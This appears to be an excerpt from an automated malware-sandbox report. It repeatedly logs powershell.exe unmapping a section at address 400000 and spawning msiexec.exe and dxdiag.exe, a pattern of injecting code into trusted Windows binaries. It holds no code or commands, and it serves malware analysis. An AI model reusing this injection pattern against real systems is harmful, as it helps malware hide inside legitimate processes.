Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
